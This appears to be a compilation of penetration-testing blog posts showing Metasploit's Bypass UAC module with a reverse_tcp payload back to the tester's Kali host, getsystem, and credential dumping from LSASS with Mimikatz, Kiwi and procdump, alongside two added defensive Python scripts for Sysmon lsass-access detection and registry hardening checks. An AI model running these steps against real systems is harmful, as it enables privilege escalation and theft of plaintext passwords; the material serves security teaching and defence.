System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to all-powerful System-level access. The problem is it doesn’t seem to work anymore, so let’s see what changed and get some plain text passwords while we are at it!

It’s been a while since I have used Metasploit’s Bypass UAC module, and when I went to use it recently it kept erroring out. Once you had a remote shell with Metasploit, all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple: the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

[Screenshot: BypassUAC Metasploit 1]

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from the one used for the original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

[Screenshot: BypassUAC Metasploit 2]

Now if we type “getsystem” it should work, as verified by “getuid”:

[Screenshot: BypassUAC Metasploit 3]

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type “load kiwi”:

[Screenshot: BypassUAC Mimikatz 4]

Then type “creds_all”:

[Screenshot: BypassUAC Mimikatz 5]

Oh look, user “Dan” is using the hyper-secure password of “password”. Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC you select a different port number for it to use, or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Then, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to System level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux”. A follow-up book is coming out very soon!

Grabbing Passwords from Memory using Procdump and Mimikatz

When I was working on my Pulling Remote Word Documents from RAM using Kali Linux article, I was curious if you could use the same technique to pull the system passwords, and you can…

With the help of Mimikatz!

I tried grabbing the lsass.exe process with procdump, just like I did in the previous article, but when I ran strings I didn’t see any passwords. Well, silly me, you wouldn’t! But as the Zena Forensics blog explains, just take the lsass.exe procdump and run Mimikatz on it!

(Sorry Gentilkiwi, you would think I would know better!  🙂 )

Okay, so once we have the procdump of the lsass.exe process saved as lsassdump.dmp like so:

[Screenshot: lsass procdump]

All we need to do is run the resultant .dmp file through Mimikatz:

  • Run Mimikatz
  • Type “sekurlsa::Minidump lsassdump.dmp”
  • Lastly, type “sekurlsa::logonPasswords”

And that is it! Mimikatz works its magic on the .dmp file and within a second or so we see this:


Passwords! Wow, this is a really secure Windows 7 system I see…

So if we can get a memory dump of the lsass.exe process (you need an administrator-level account to do so), we can take our time and pop the passwords out of it at any time (and anywhere) with Mimikatz.
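From the defender’s side, the common thread in the procdump technique above and in the in-memory Meterpreter “kiwi” extension is that some process has to open lsass.exe with memory-read rights. Sysmon Event ID 10 (ProcessAccess) records exactly that handle, including the access mask and the call stack. The script below is an added example, not part of this article or of the Sysmon or Mimikatz projects: it parses constructed Sysmon ProcessAccess messages (the three events, the process names and PIDs are made up for the demo) and flags accesses to lsass.exe that carry PROCESS_VM_READ/PROCESS_VM_WRITE or PROCESS_ALL_ACCESS, or whose call trace passes through unbacked memory (“UNKNOWN” frames, which is what injected code such as a reflectively loaded Meterpreter looks like). The allowlist of source images is a constructed starting point and must be tuned per environment.

```python
"""Flag suspicious handles to lsass.exe in Sysmon Event ID 10 (ProcessAccess) messages."""
import re
from dataclasses import dataclass, field

# Process access rights from winnt.h that matter for reading another process's memory
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that legitimately open lsass.exe on a typical build. Constructed starting
# point for the demo; a real deployment tunes this from its own baseline.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\csrss.exe",
}

# Three constructed ProcessAccess events in the Key: Value text form Sysmon renders.
# Not real captures: the times, PIDs and paths are invented for this example.
SAMPLE_EVENTS = """\
Process accessed:
RuleName: -
UtcTime: 2024-01-10 14:02:11.101
SourceImage: C:\\Windows\\System32\\svchost.exe
SourceProcessId: 880
TargetImage: C:\\Windows\\System32\\lsass.exe
TargetProcessId: 612
GrantedAccess: 0x1000
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4d4|C:\\Windows\\System32\\KERNELBASE.dll+2cbb9

Process accessed:
RuleName: -
UtcTime: 2024-01-10 14:05:43.223
SourceImage: C:\\Users\\dan\\Downloads\\procdump.exe
SourceProcessId: 4120
TargetImage: C:\\Windows\\System32\\lsass.exe
TargetProcessId: 612
GrantedAccess: 0x1FFFFF
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4d4|C:\\Users\\dan\\Downloads\\procdump.exe+1a2b

Process accessed:
RuleName: -
UtcTime: 2024-01-10 14:09:02.987
SourceImage: C:\\Windows\\System32\\notepad.exe
SourceProcessId: 5204
TargetImage: C:\\Windows\\System32\\lsass.exe
TargetProcessId: 612
GrantedAccess: 0x1010
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4d4|UNKNOWN(000001C3A4E20F1B)
"""

FIELD_RE = re.compile(r"^(\w+):\s*(.*)$")


@dataclass
class Finding:
    utc_time: str
    source_image: str
    source_pid: int
    granted_access: int
    reasons: list = field(default_factory=list)


def parse_events(text):
    """Split rendered Sysmon message text into one dict of fields per event."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line.strip())
            if m:  # the "Process accessed:" title line does not match and is skipped
                fields[m.group(1)] = m.group(2).strip()
        if fields:
            events.append(fields)
    return events


def analyze(text):
    """Return a Finding for every non-allowlisted process that opened lsass.exe suspiciously."""
    findings = []
    for ev in parse_events(text):
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        reasons = []
        if access == PROCESS_ALL_ACCESS:
            reasons.append("PROCESS_ALL_ACCESS handle to lsass.exe (full-dump tooling)")
        elif access & (PROCESS_VM_READ | PROCESS_VM_WRITE):
            reasons.append(f"memory read/write right in handle (0x{access:X}); enough for a minidump")
        if "UNKNOWN" in ev.get("CallTrace", ""):
            reasons.append("call trace passes through unbacked memory, typical of injected code")
        if reasons and ev.get("SourceImage", "").lower() not in ALLOWLIST:
            findings.append(Finding(ev.get("UtcTime", ""), ev["SourceImage"],
                                    int(ev.get("SourceProcessId", "0")), access, reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.utc_time} pid={f.source_pid} {f.source_image} access=0x{f.granted_access:X}")
        for r in f.reasons:
            print(f"    - {r}")
```

The first sample event (svchost with 0x1000, PROCESS_QUERY_LIMITED_INFORMATION only) is deliberately benign and is not reported; the procdump and notepad events are. Matching on the access-mask bits rather than on a list of literal masks such as 0x1010 or 0x1FFFFF avoids missing tools that request a slightly different combination of rights.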

For more information, check out my latest book, “Basic Security Testing with Kali Linux, 3rd Edition” which has a complete chapter on using Mimikatz!


Recovering Plain Text Passwords with Metasploit and Mimikatz

I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peek at the type of material that will be in the book.

Mimikatz, created by our friend Gentil Kiwi, is a great password recovery tool. It is able to recover passwords from several Windows processes in PLAIN TEXT.

Not too long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account and we used the Bypass UAC module to bump our access up to System level. (Explained in the book)

Now we just need to load the mimikatz module. There is a 32-bit and a 64-bit module; choose accordingly. For this demo we will be using the 32-bit one.

[Screenshot: Mimikatz 1]

  1. At the Meterpreter prompt, type “load mimikatz”.
  2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

[Screenshot: Mimikatz 2]

The help is pretty self-explanatory; basically, type the command corresponding to the credentials you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt, or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources: Windows login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

  1. Type “msv”.

[Screenshot: Mimikatz 3]

And there you go: a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

  1. Type “Kerberos”.

[Screenshot: Mimikatz 4]

If you look at our user Ralf, you will see his password in plain text!

And that is it: once we have a remote session with Metasploit, recovering clear text passwords with Mimikatz is just a few commands away.
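Every technique on this page depends on configuration a defender can check: the Bypass UAC module in the first section relies on UAC being below “Always notify” so that signed Windows binaries auto-elevate, and the plain text passwords recovered by Kiwi, by procdump plus Mimikatz, and by the “kerberos” command here are there because WDigest caches logon credentials in LSASS (on by default on Windows 7, the target in all three write-ups) and because LSASS is not running as a protected process. The script below is an added example, not part of this article: it parses a .reg export of the three relevant keys and reports each setting as OK, WEAK, REVIEW or N/A. The two exports are constructed for the demo (the “Windows 7 defaults” one mirrors what the page’s target would look like; neither comes from a real machine), and the parser covers only the dword and string syntax those keys use.

```python
"""Assess UAC, WDigest and LSA-protection posture from a .reg export of the relevant keys."""
import re

POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

KEY_RE = re.compile(r"^\[([^\]]+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.+)$')

# Constructed .reg exports. regedit writes these as UTF-16LE, so read real files with
# open(path, encoding="utf-16"); the strings here stand in for that file content.
WIN7_DEFAULTS = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"EnableLUA"=dword:00000001
"ConsentPromptBehaviorAdmin"=dword:00000005
"PromptOnSecureDesktop"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa]
"LimitBlankPasswordUse"=dword:00000001
"""

HARDENED = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"EnableLUA"=dword:00000001
"ConsentPromptBehaviorAdmin"=dword:00000002
"PromptOnSecureDesktop"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest]
"UseLogonCredential"=dword:00000000

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa]
"RunAsPPL"=dword:00000001
"""


def parse_reg(text):
    """Parse [key] headers plus dword: and "string" values into {key: {name: value}}."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            reg.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.groups()
            if data.startswith("dword:"):
                reg[current][name] = int(data[6:], 16)
            elif len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                reg[current][name] = data[1:-1]
            else:
                reg[current][name] = data  # hex(...) blobs and "-" deletions kept verbatim
    return reg


def assess(reg_text, legacy_os):
    """legacy_os=True means Windows 7 / Server 2008 R2: WDigest caching stays on unless
    UseLogonCredential is explicitly 0 (after KB2871997) and RunAsPPL does not exist."""
    reg = parse_reg(reg_text)
    pol = reg.get(POLICY_KEY, {})
    results = {}

    lua = pol.get("EnableLUA")
    results["EnableLUA"] = (("OK", "UAC enabled") if lua == 1 else
                            ("WEAK", f"UAC disabled or unset ({lua!r}); admin tokens run fully elevated"))

    cpba = pol.get("ConsentPromptBehaviorAdmin", 5)  # 5 is the OS default when absent
    secure = pol.get("PromptOnSecureDesktop", 1)
    if cpba == 2 and secure == 1:
        results["ConsentPromptBehaviorAdmin"] = ("OK", "Always notify: Windows binaries do not auto-elevate")
    elif cpba in (0, 5):
        results["ConsentPromptBehaviorAdmin"] = ("WEAK", f"level {cpba}: signed Windows binaries auto-elevate, "
                                                         "which UAC-bypass modules depend on")
    else:
        results["ConsentPromptBehaviorAdmin"] = ("REVIEW", f"policy-only value {cpba}, secure desktop={secure}")

    wd = reg.get(WDIGEST_KEY, {}).get("UseLogonCredential")
    if wd == 0:
        results["UseLogonCredential"] = ("OK", "WDigest no longer keeps plaintext credentials in LSASS")
    elif wd is None and not legacy_os:
        results["UseLogonCredential"] = ("OK", "absent; off by default on Windows 8.1 / 2012 R2 and later")
    else:
        results["UseLogonCredential"] = ("WEAK", "WDigest caches plaintext logon credentials in LSASS "
                                                 "(on Windows 7 / 2008 R2 install KB2871997 and set it to 0)")

    ppl = reg.get(LSA_KEY, {}).get("RunAsPPL")
    if legacy_os:
        results["RunAsPPL"] = ("N/A", "LSA protection needs Windows 8.1 / Server 2012 R2 or later")
    elif ppl in (1, 2):  # 2 = enabled with UEFI lock on recent builds
        results["RunAsPPL"] = ("OK", "LSASS is a protected process; unprotected processes cannot read its memory")
    else:
        results["RunAsPPL"] = ("WEAK", "LSASS is an ordinary process; any admin process can read its memory")
    return results


if __name__ == "__main__":
    for label, text, legacy in (("Windows 7 defaults", WIN7_DEFAULTS, True), ("hardened", HARDENED, False)):
        print(f"== {label} ==")
        for setting, (status, detail) in assess(text, legacy).items():
            print(f"{status:6} {setting}: {detail}")
```

On the constructed Windows 7 export the script reports UAC enabled but at the auto-elevating level, WDigest caching on, and LSA protection unavailable, which is exactly the posture the three write-ups exploit; the hardened export comes back clean. Even with all three settings fixed, an administrator who can run code as SYSTEM can still reach credential material by other routes, so the registry check is a baseline, not a complete defence.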

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)